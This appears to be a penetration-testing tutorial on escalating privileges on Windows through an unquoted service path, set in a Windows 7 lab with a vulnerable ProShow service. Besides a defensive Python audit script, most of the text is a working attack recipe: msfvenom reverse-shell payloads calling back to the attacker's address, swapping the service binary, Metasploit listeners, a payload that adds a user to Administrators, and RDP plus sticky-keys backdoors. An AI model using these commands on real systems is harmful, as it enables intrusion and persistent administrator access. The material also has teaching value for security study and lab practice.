Hello Friends!! In this article we are demonstrating Windows privilege escalation via an unquoted service path. In penetration testing, when we spawn a command shell as a local user, it is not possible to check restricted files or folders, therefore we need to escalate privileges to get administrator access.
Table of content
· Introduction
· Lab setup
· Spawn command shell as local user
· Escalated privilege via Prepend-migrate
· Escalated privilege via adding user to Administrators group
· Escalated privilege via RDP & Sticky_keys
Introduction
Unquoted Service Path Vulnerability
The vulnerability is related to the path of a service executable that contains a space and is not enclosed in quotation marks (""). If, in addition, the executable (or a folder on its path) has write permissions for low-privileged users, an attacker can replace it with a malicious exe file and the service will run that file, escalating to admin privileges.
Lab set-up
Victim's machine: Windows 7
Attacker's machine: Kali Linux
First we downloaded and installed a vulnerable application, Photodex ProShow, on our Windows system; we found it on Exploit DB.
Spawning Victim's Machine
We need to compromise the Windows machine at least once to gain a meterpreter session. As you can observe, we already have the victim's meterpreter session. Now let's open the command shell from here.
shell
As you can observe, we have shell access as local_user, and to get cmd as administrator we need to escalate its privileges. First we can enumerate all the automatically started services on the victim's machine and discover those whose path is not enclosed in quotes with the help of the following command:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
So we have enumerated the following path: C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe. As you can see there are no quotes around the path, and the path contains spaces.
Now let's check the file permissions using the following command:
icacls Scsiaccess.exe
As you can observe, it has write permission for Everyone, which means user raj can overwrite this file.
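The two checks above (the wmic enumeration and the icacls look at the binary) are what an administrator auditing a host for this weakness repeats across every service. The following Python script is an added example written for this article, not code from the original post or from Metasploit: it takes service rows in the shape of the fields the wmic command prints (a constructed sample, with the ProShow path mirroring the one found above), flags auto-start services whose image path is unquoted and contains spaces, lists the locations Windows will try before the genuine executable (so their folder ACLs can be reviewed with icacls), and prints the sc config command that rewrites the path with quotes. The service names other than the ProShow path, and the ntpath-based directory listing, are assumptions for the example.

```python
import ntpath
import re

# Constructed sample rows in the shape of the fields printed by
#   wmic service get name,displayname,pathname,startmode
# These entries are made up for this example and are not output captured from
# the article's lab machine; only the ProShow path mirrors the one found above.
SAMPLE_SERVICES = [
    {"Name": "ProShowService",
     "PathName": r"C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe",
     "StartMode": "Auto"},
    {"Name": "GoodSvc",
     "PathName": r'"C:\Program Files\Good Vendor\goodsvc.exe" -run',
     "StartMode": "Auto"},
    {"Name": "Spooler",
     "PathName": r"C:\Windows\System32\spoolsv.exe",
     "StartMode": "Auto"},
    {"Name": "ManualTool",
     "PathName": r"C:\Tools\My Tool\tool.exe -x",
     "StartMode": "Manual"},
]

# Non-greedy: the image path ends at the first ".exe"; anything after it is arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(.*)$", re.IGNORECASE)


def split_image_path(pathname):
    """Return (executable_path, arguments, was_quoted) for a service PathName value."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        if end == -1:
            raise ValueError("unterminated quote in PathName: %r" % pathname)
        return pathname[1:end], pathname[end + 1:].strip(), True
    m = _EXE_RE.match(pathname)
    if m:
        return m.group(1), m.group(2).strip(), False
    return pathname, "", False  # no .exe visible: treat the whole value as the image path


def is_unquoted_with_space(pathname):
    exe, _args, quoted = split_image_path(pathname)
    return (not quoted) and (" " in exe)


def hijack_candidates(exe_path):
    """Names Windows tries, in order, for an unquoted path with spaces: each prefix
    ending at a space with .exe appended, and finally the genuine executable."""
    candidates = [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]
    candidates.append(exe_path)
    return candidates


def directories_to_review(exe_path):
    """Folders whose ACLs decide whether a candidate (or the real exe) can be planted
    or overwritten; check each with icacls as the article does for the binary."""
    seen, dirs = set(), []
    for cand in hijack_candidates(exe_path):
        d = ntpath.dirname(cand)
        if d not in seen:
            seen.add(d)
            dirs.append(d)
    return dirs


def quoted_pathname(pathname):
    exe, args, _quoted = split_image_path(pathname)
    return '"%s"' % exe + (" " + args if args else "")


def remediation_command(name, pathname):
    """sc.exe syntax that rewrites the service binPath with the quoted image path.
    The inner quotes are escaped as \\" because the command is typed into cmd.exe."""
    exe, args, _quoted = split_image_path(pathname)
    inner = '\\"%s\\"' % exe + (" " + args if args else "")
    return 'sc config %s binPath= "%s"' % (name, inner)


def audit(services, only_auto=True):
    """Return one finding per service with an unquoted, space-containing image path."""
    findings = []
    for svc in services:
        if only_auto and svc["StartMode"].lower() != "auto":
            continue
        if not is_unquoted_with_space(svc["PathName"]):
            continue
        exe, _args, _quoted = split_image_path(svc["PathName"])
        findings.append({
            "name": svc["Name"],
            "exe": exe,
            "candidates": hijack_candidates(exe),
            "review_dirs": directories_to_review(exe),
            "fix": remediation_command(svc["Name"], svc["PathName"]),
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        print("%s: %s" % (f["name"], f["exe"]))
        for c in f["candidates"]:
            print("  tried in order:", c)
        for d in f["review_dirs"]:
            print("  review ACL with icacls:", d)
        print("  fix:", f["fix"])
```

With only_auto left at its default the sample yields a single finding, the ProShow service; the manual-start tool is reported too when only_auto=False. The fix line is the value an administrator applies (or the vendor ships) so that the service control manager no longer has to guess where the executable name ends.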
Escalated privilege via Prepend-migrate
Now we can place any malicious exe file in the same folder; when the service is restarted, Windows will launch this executable instead of the genuine exe, giving us admin privileges.
Open the terminal in Kali Linux and type the following command to generate an exe payload using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 PrependMigrate=true PrependMigrateProc=explorer.exe -f exe > /root/Desktop/Scsiaccess.exe
The above command creates a malicious exe file on the Desktop; now send this file to the victim. The payload migrates into another process if its own process gets killed, hence the attacker will not lose his session if the victim kills the payload's process ID from the system.
Now replace the genuine executable file with the malicious exe. Here I have renamed the genuine Scsiaccess.exe to Scsiaccess.exe.original, uploaded the malicious Scsiaccess.exe into the same folder and then rebooted the victim's machine.
move scsiaccess.exe scsiaccess.exe.original
upload /root/Desktop/scsiaccess.exe
reboot
Simultaneously we started a multi/handler listener in a new terminal to catch the meterpreter session with admin privilege.
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
Yuppie!! And after some time we got a shell with admin privileges.
Escalated privilege via adding user to Administrators group
After spawning a shell as local_user, we enumerated the list of usernames with and without admin privileges. We found that user raaz is not a member of the admin group.
net user
net user raaz
So again we generated an exe file which will add user raaz to the Administrators group. The name of our exe file will be the same, i.e. Scsiaccess.exe.
msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe > /root/Desktop/scsiaccess.exe
Now repeat the above steps: replace the genuine executable file with the malicious exe file and reboot the host machine.
If you look at the following image, you can observe that user raaz has become a member of the Administrators group.
Escalated privilege via RDP & Sticky_keys
Generate an exe using msfvenom with the same name, Scsiaccess.exe, and then transfer it to the victim's machine; meanwhile run multi/handler with an AutoRunScript that will enable the RDP service once the service gets restarted.
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > set AutoRunScript post/windows/manage/enable_rdp
msf exploit(multi/handler) > exploit
Similarly, we set the AutoRunScript to enable sticky_keys once the service restarts.
msf exploit(multi/handler) > set AutoRunScript post/windows/manage/sticky_keys
msf exploit(multi/handler) > run
As you can observe from the screenshot below, another meterpreter session (session 3) was opened which has administrative rights. Now let's connect to the victim's host via RDP.
rdp 192.168.1.101
Now press the Shift key 5 times in a row and you will get a command prompt as administrator.